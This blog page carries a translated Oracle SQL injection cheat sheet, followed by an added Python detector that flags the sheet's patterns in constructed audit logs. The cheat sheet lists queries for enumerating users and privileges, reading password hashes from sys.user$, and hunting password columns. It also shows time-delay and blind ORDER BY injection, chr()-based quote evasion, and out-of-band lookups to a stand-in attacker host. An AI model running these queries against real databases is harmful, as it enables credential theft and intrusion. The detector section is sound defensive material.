<!doctype html>
<html class="no-js" lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>
Oracle Injection Cheat Sheet - 雪地
</title>
<link href="atom.xml" rel="alternate" title="雪地" type="application/atom+xml">
<link rel="stylesheet" href="asset/css/foundation.min.css" />
<link rel="stylesheet" href="asset/css/docs.css" />
<link rel="icon" href="asset/img/favicon.ico" />
<script src="asset/js/vendor/modernizr.js"></script>
<script src="asset/js/vendor/jquery.js"></script>
<script src="asset/highlightjs/highlight.pack.js"></script>
<link href="asset/highlightjs/styles/github.css" media="screen, projection" rel="stylesheet" type="text/css">
<script>hljs.initHighlightingOnLoad();</script>
<script type="text/javascript">
function before_search(){
var searchVal = 'site:yinzo.github.io ' + document.getElementById('search_input').value;
document.getElementById('search_q').value = searchVal;
return true;
}
</script>
</head>
<body class="antialiased hide-extras">
<div class="marketing off-canvas-wrap" data-offcanvas>
<div class="inner-wrap">
<nav class="top-bar docs-bar hide-for-small" data-topbar>
<section class="top-bar-section">
<div class="row">
<div style="position: relative;width:100%;"><div style="position: absolute; width:100%;">
<ul id="main-menu" class="left">
<li id="menu_item_index"><a href="index.html">Blog</a></li>
<li id="menu_item_archives"><a href="archives.html">Archives</a></li>
<li id="menu_item_about"><a href="http://yinz.xyz/">Home</a></li>
</ul>
<ul class="right" id="search-wrap">
<li>
<form target="_blank" onsubmit="return before_search();" action="http://google.com/search" method="get">
<input type="hidden" id="search_q" name="q" value="" />
<input tabindex="1" type="search" id="search_input" placeholder="Search"/>
</form>
</li>
</ul>
</div></div>
</div>
</section>
</nav>
<nav class="tab-bar show-for-small">
<a href="javascript:void(0)" class="left-off-canvas-toggle menu-icon">
<span> 雪地</span>
</a>
</nav>
<aside class="left-off-canvas-menu">
<ul class="off-canvas-list">
<li><a href="index.html">Blog</a></li>
<li><a href="archives.html">Archives</a></li>
<li><a href="http://yinz.xyz/">Home</a></li>
<li><label>Categories</label></li>
<li><a href="Security%20Info.html">Security Info</a></li>
<li><a href="Adversary%20Learning.html">Adversary Learning</a></li>
<li><a href="TCPIP.html">TCP/IP</a></li>
<li><a href="Pattern%20Recognition.html">Pattern Recognition</a></li>
<li><a href="Python.html">Python</a></li>
<li><a href="OS.html">OS</a></li>
<li><a href="Deep%20Learning.html">Deep Learning</a></li>
<li><a href="Machine%20Learning.html">Machine Learning</a></li>
</ul>
</aside>
<a class="exit-off-canvas" href="#"></a>
<section id="main-content" role="main" class="scroll-container">
<script type="text/javascript">
$(function(){
$('#menu_item_index').addClass('is_active');
});
</script>
<div class="row">
<div class="large-8 medium-8 columns">
<div class="markdown-body article-wrap">
<div class="article">
<h1>Oracle Injection Cheat Sheet</h1>
<div class="read-more clearfix">
<span class="date">2015/8/28 17:30 PM</span>
<span class="comments">
</span>
</div>
</div><!-- article -->
<div class="article-content">
<p><small>Translated by Yinzo; please keep the attribution when reposting. Original article: <a href="http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet">http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet</a></small></p>
<p>Note: some of the queries below can only be run by an admin; I mark those with "<strong><code>-priv</code></strong>" at the end of the query.</p>
<span id="more"></span><!-- more -->
<p>Version detection:</p>
<pre><code>SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
</code></pre>
<p>Comments:</p>
<pre><code>SELECT 1 FROM dual -- comment
</code></pre>
<p><em>Note: an Oracle SELECT statement must contain a FROM clause, so when we are not really querying a table we have to use the dummy table 'dual'.</em></p>
<p>Current user:</p>
<pre><code>SELECT user FROM dual
</code></pre>
<p>List all users:</p>
<pre><code>SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; -- priv
</code></pre>
<p>List password hashes:</p>
<pre><code>SELECT name, password, astatus FROM sys.user$ -- priv, <= 10g. astatus tells you whether the account is locked
SELECT name,spare4 FROM sys.user$ -- priv, 11g
</code></pre>
<p>Password cracking:</p>
<p><a href="http://www.red-database-security.com/software/checkpwd.html">checkpwd</a> can crack the DES-based hashes of Oracle 8, 9 and 10.</p>
<p>List privileges:</p>
<pre><code>SELECT * FROM session_privs; -- current user's privileges
SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list privileges of a given user
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users that hold a given privilege
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
</code></pre>
<p>List DBA accounts:</p>
<pre><code>SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs and their privileges
</code></pre>
<p>Current database:</p>
<pre><code>SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;
</code></pre>
<p>List databases:</p>
<pre><code>SELECT DISTINCT owner FROM all_tables; -- list databases (one per user)
</code></pre>
<p>-- Other databases can be found by querying the TNS listener; see <a href="http://www.jammed.com/%7Ejwa/hacks/security/tnscmd/tnscmd-doc.html">tnscmd</a> for details.</p>
<p>List column names:</p>
<pre><code>SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
</code></pre>
<p>List table names:</p>
<pre><code>SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
</code></pre>
<p>Find tables from a column name:</p>
<pre><code>SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
</code></pre>
<p>-- Note: table names are all uppercase</p>
<p>Select the Nth row:</p>
<pre><code>SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- select the 9th row (counting from 1)
</code></pre>
<p>Select the Nth character:</p>
<pre><code>SELECT substr('abcd', 3, 1) FROM dual; -- returns the 3rd character, 'c'
</code></pre>
<p>Bitwise AND:</p>
<pre><code>SELECT bitand(6,2) FROM dual; -- returns 2
SELECT bitand(6,1) FROM dual; -- returns 0
</code></pre>
<p>ASCII value to character:</p>
<pre><code>SELECT chr(65) FROM dual; -- returns A
</code></pre>
<p>Character to ASCII value:</p>
<pre><code>SELECT ascii('A') FROM dual; -- returns 65
</code></pre>
<p>Casting:</p>
<pre><code>SELECT CAST(1 AS char) FROM dual;
SELECT CAST('1' AS int) FROM dual;
</code></pre>
<p>String concatenation:</p>
<pre><code>SELECT 'A' || 'B' FROM dual; -- returns AB
</code></pre>
<p>IF statement:</p>
<pre><code>BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;
</code></pre>
<p>-- Doesn't work well together with SELECT statements</p>
<p>CASE statement:</p>
<pre><code>SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2
</code></pre>
<p>Avoiding quotes:</p>
<pre><code>SELECT chr(65) || chr(66) FROM dual; -- returns AB
</code></pre>
<p>Time delay:</p>
<pre><code>BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't be used in a SELECT
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered or slow
</code></pre>
<p>-- For more on time delays see <a href="http://technet.microsoft.com/en-us/library/cc512676.aspx">Heavy Queries</a></p>
<p>Make DNS requests:</p>
<pre><code>SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;
</code></pre>
<p>Command execution:</p>
<p>Commands can be executed if Java is installed on the target machine; <a href="http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql">see here</a>.</p>
<p>ExtProc sometimes works too, though I usually can't get it to succeed; <a href="http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql">see here</a>.</p>
<p>Local file access:</p>
<p><a href="http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql">UTL_FILE</a> can sometimes be used. It should work if the following statement does not return null.</p>
<pre><code>SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
</code></pre>
<p><a href="http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql">Java</a> can be used to read and write files, except on Oracle Express.</p>
<p>Hostname, IP address:</p>
<pre><code>SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; -- get IP address
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- get hostname
</code></pre>
<p>Locate DB files:</p>
<pre><code>SELECT name FROM V$DATAFILE;
</code></pre>
<p>Default/system databases:</p>
<pre><code>SYSTEM
SYSAUX
</code></pre>
<h3 id="toc_0">Extra tips:</h3>
<p>List all table names in a single string:</p>
<pre><code>select rtrim(xmlagg(xmlelement(e, table_name || ',')).extract('//text()').extract('//text()') ,',') from all_tables
</code></pre>
<p>-- Use this for union-based injection when only one row is available for returning data</p>
<p>Blind injection in ORDER BY:</p>
<pre><code>order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = 'a' and rownum = 1)=1) then column_name1 else column_name2 end
</code></pre>
<p>-- You need to know two column names of the same data type for this to work</p>
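<p>Seen from the defender's side, the statements on this sheet are also the signatures a database audit pipeline should flag. The Python below is an added example, not part of the original cheat sheet or of pentestmonkey's material: it folds the <code>chr()</code> concatenation trick (the "Avoiding quotes" entry above) back into the literal it builds, then matches the normalised text against indicator patterns taken from the queries on this page (<code>v$version</code>, <code>sys.user$</code>, <code>all_tab_columns ... LIKE '%PASS%'</code>, <code>UTL_INADDR</code>/<code>UTL_HTTP</code>, <code>DBMS_LOCK.SLEEP</code>, <code>ORDER BY CASE WHEN</code>). The log line format, the <code>WEBAPP</code> user and the log content are constructed for the example and do not reflect a real Oracle audit format.</p>

```python
"""Flag the Oracle reconnaissance and out-of-band primitives from this cheat
sheet in captured SQL text.

Added example, not part of the original cheat sheet: the indicator patterns
are derived from the queries on this page, and the audit log lines in
SAMPLE_LOG are constructed for the example (format, user and timestamps are
assumptions, not a real Oracle audit format).
"""
import re

# One pattern per technique family on the page, applied to normalised text
# (whitespace collapsed, chr() concatenations folded, lower-cased).
INDICATORS = {
    "version_probe":        re.compile(r"\bv\$(version|instance)\b"),
    "user_enum":            re.compile(r"\ball_users\b|\bsys\.user\$"),
    "hash_read":            re.compile(r"sys\.user\$.*\b(password|spare4)\b"
                                       r"|\b(password|spare4)\b.*sys\.user\$"),
    "priv_enum":            re.compile(r"\b(session_privs|dba_sys_privs|dba_role_privs)\b"),
    "password_column_hunt": re.compile(r"all_tab_columns.*column_name\s+like\s+'%pass%'"),
    "oob_dns_http":         re.compile(r"\butl_(inaddr|http)\b"),
    "time_delay":           re.compile(r"\bdbms_lock\.sleep\b"),
    "utl_file_dir_check":   re.compile(r"v\$parameter2.*utl_file_dir"),
    "blind_order_by":       re.compile(r"order\s+by\s+case\s+when"),
}

CHR_CALL = re.compile(r"chr\((\d+)\)", re.IGNORECASE)
LITERAL_PAIR = re.compile(r"'([^']*)'\s*\|\|\s*'([^']*)'")
# Constructed log format: <timestamp> user=<db user> sql="<statement>"
LOG_LINE = re.compile(r'^(?P<ts>\S+) user=(?P<user>\S+) sql="(?P<sql>.*)"$')


def fold_chr(sql: str) -> str:
    """Rewrite chr(65)||chr(66) back into the literal 'AB' it builds, so the
    quote-avoidance trick from the sheet reads as the string it produces."""
    def to_literal(m):
        code = int(m.group(1))
        if code > 0x10FFFF:
            return m.group(0)
        ch = chr(code)
        # Quote characters and non-printables are left as chr() calls: they
        # would need Oracle-specific escaping and no indicator depends on them.
        if ch == "'" or not ch.isprintable():
            return m.group(0)
        return "'" + ch + "'"

    folded = CHR_CALL.sub(to_literal, sql)
    # Merge 'a'||'b'||'c' chains pairwise until nothing changes.
    while True:
        merged = LITERAL_PAIR.sub(r"'\1\2'", folded)
        if merged == folded:
            return merged
        folded = merged


def normalize(sql: str) -> str:
    """Collapse whitespace, fold chr() concatenations, then lower-case."""
    text = re.sub(r"\s+", " ", sql.strip())
    return fold_chr(text).lower()


def scan_query(sql: str) -> list:
    """Return the names of every indicator that matches the statement."""
    text = normalize(sql)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_log(lines) -> list:
    """Return (timestamp, user, indicators) for each flagged log line."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        hits = scan_query(m.group("sql"))
        if hits:
            findings.append((m.group("ts"), m.group("user"), hits))
    return findings


# Constructed sample: one benign bind-variable query, then statements modelled
# on the sheet, including a chr()-encoded '%PASS%' column hunt.
SAMPLE_LOG = [
    '2015-08-28T17:30:01Z user=WEBAPP sql="SELECT id, name FROM products WHERE id = :1"',
    '2015-08-28T17:30:02Z user=WEBAPP sql="SELECT banner FROM v$version WHERE banner LIKE \'Oracle%\'"',
    '2015-08-28T17:30:03Z user=WEBAPP sql="SELECT owner, table_name FROM all_tab_columns '
    'WHERE column_name LIKE chr(37)||chr(80)||chr(65)||chr(83)||chr(83)||chr(37)"',
    '2015-08-28T17:30:04Z user=WEBAPP sql="SELECT UTL_INADDR.get_host_address(\'blah.attacker.com\') FROM dual"',
    '2015-08-28T17:30:05Z user=WEBAPP sql="SELECT name, spare4 FROM sys.user$"',
]

if __name__ == "__main__":
    for ts, user, hits in scan_log(SAMPLE_LOG):
        print(f"{ts} {user}: {', '.join(hits)}")
```

<p>Run the file directly to print the flagged lines. The normalisation step matters more than the pattern list: the third sample line carries the same <code>'%PASS%'</code> column hunt as the sheet, but encoded with <code>chr()</code> so that a naive substring match on the raw statement would miss it. The first line, which uses a bind variable (<code>:1</code>) rather than string concatenation, produces no finding, which is the shape application queries should have in the first place.</p>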
</div>
<div class="row">
<div class="large-6 columns">
<p class="text-left" style="padding:15px 0px;">
<a href="14608288193470.html"
title="Previous Post: Summer 2015">« Summer 2015</a>
</p>
</div>
<div class="large-6 columns">
<p class="text-right" style="padding:15px 0px;">
<a href="14608288742293.html"
title="Next Post: Fixing the error thrown when running Python's pytesseract library">Fixing the error thrown when running Python's pytesseract library »</a>
</p>
</div>
</div>
<div class="comments-wrap">
<div class="share-comments">
<div id="disqus_thread"></div>
<script>
/**
* RECOMMENDED CONFIGURATION VARIABLES: EDIT AND UNCOMMENT THE SECTION BELOW TO INSERT DYNAMIC VALUES FROM YOUR PLATFORM OR CMS.
* LEARN WHY DEFINING THESE VARIABLES IS IMPORTANT: https://disqus.com/admin/universalcode/#configuration-variables
*/
/*
var disqus_config = function () {
this.page.url = PAGE_URL; // Replace PAGE_URL with your page's canonical URL variable
this.page.identifier = PAGE_IDENTIFIER; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
};
*/
(function() { // DON'T EDIT BELOW THIS LINE
var d = document, s = d.createElement('script');
s.src = '//yinzo.disqus.com/embed.js';
s.setAttribute('data-timestamp', +new Date());
(d.head || d.body).appendChild(s);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
</div>
</div>
</div><!-- article-wrap -->
</div><!-- large 8 -->
<div class="large-4 medium-4 columns">
<div class="hide-for-small">
<div id="sidebar" class="sidebar">
<div id="site-info" class="site-info">
<div class="site-a-logo"><img src="asset/img/3.png" /></div>
<h1>雪地</h1>
<div class="site-des"></div>
<div class="social">
<a class="github" target="_blank" href="https://github.com/Yinzo" title="GitHub">GitHub</a>
<a class="email" href="mailto:[email protected]" title="Email">Email</a>
<a class="rss" href="atom.xml" title="RSS">RSS</a>
</div>
</div>
<div id="site-categories" class="side-item ">
<div class="side-header">
<h2>Categories</h2>
</div>
<div class="side-content">
<p class="cat-list">
<a href="Security%20Info.html"><strong>Security Info</strong></a>
<a href="Adversary%20Learning.html"><strong>Adversary Learning</strong></a>
<a href="TCPIP.html"><strong>TCP/IP</strong></a>
<a href="Pattern%20Recognition.html"><strong>Pattern Recognition</strong></a>
<a href="Python.html"><strong>Python</strong></a>
<a href="OS.html"><strong>OS</strong></a>
<a href="Deep%20Learning.html"><strong>Deep Learning</strong></a>
<a href="Machine%20Learning.html"><strong>Machine Learning</strong></a>
</p>
</div>
</div>
<div id="site-categories" class="side-item">
<div class="side-header">
<h2>Recent Posts</h2>
</div>
<div class="side-content">
<ul class="posts-list">
<li class="post">
<a href="14968173531750.html">CS229 Study Notes Part 3</a>
</li>
<li class="post">
<a href="14965964854250.html">CS229 Study Notes Part 2</a>
</li>
<li class="post">
<a href="14946020792948.html">CS229 Study Notes Part 1</a>
</li>
<li class="post">
<a href="14883590547961.html">Original Model Optimisation Notes</a>
</li>
<li class="post">
<a href="14863637393852.html">CNN Implementation of a Low-Quality Danmaku Comment Classifier</a>
</li>
</ul>
</div>
</div>
<div id="site-link" class="side-item">
<div class="side-header">
<h2>Link</h2>
</div>
<div class="side-content">
<p class="link-list">
<a href="http://blog.winkidney.com/">阿毛</a>
</p>
</div>
</div>
</div><!-- sidebar -->
</div><!-- hide for small -->
</div><!-- large 4 -->
</div><!-- row -->
<div class="page-bottom clearfix">
<div class="row">
<p class="copyright">Copyright © 2016
Powered by <a target="_blank" href="http://www.mweb.im">MWeb</a>,
Theme used <a target="_blank" href="http://github.com">GitHub CSS</a>.
Modified by <a target="_blank" href="http://yinz.xyz">Yinzo</a>.</p>
</div>
</div>
</section>
</div>
</div>
<script src="asset/js/foundation.min.js"></script>
<script>
$(document).foundation();
function fixSidebarHeight(){
var w1 = $('.markdown-body').height();
var w2 = $('#sidebar').height();
if (w1 > w2) { $('#sidebar').height(w1); };
}
$(function(){
fixSidebarHeight();
})
$(window).load(function(){
fixSidebarHeight();
});
</script>
<script src="asset/chart/all-min.js"></script><script type="text/javascript">$(function(){ var mwebii=0; var mwebChartEleId = 'mweb-chart-ele-'; $('pre>code').each(function(){ mwebii++; var eleiid = mwebChartEleId+mwebii; if($(this).hasClass('language-sequence')){ var ele = $(this).addClass('nohighlight').parent(); $('<div id="'+eleiid+'"></div>').insertAfter(ele); ele.hide(); var diagram = Diagram.parse($(this).text()); diagram.drawSVG(eleiid,{theme: 'simple'}); }else if($(this).hasClass('language-flow')){ var ele = $(this).addClass('nohighlight').parent(); $('<div id="'+eleiid+'"></div>').insertAfter(ele); ele.hide(); var diagram = flowchart.parse($(this).text()); diagram.drawSVG(eleiid); } });});</script>
<script type="text/javascript" src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script><script type="text/x-mathjax-config">MathJax.Hub.Config({TeX: { equationNumbers: { autoNumber: "AMS" } }});</script>
<script src="asset/js/instantclick.min.js" data-no-instant></script>
<script data-no-instant>InstantClick.on('change', function() {
MathJax.Hub.Queue(["Typeset",MathJax.Hub]);
});</script>
<script data-no-instant>InstantClick.init();</script>
</body>
</html>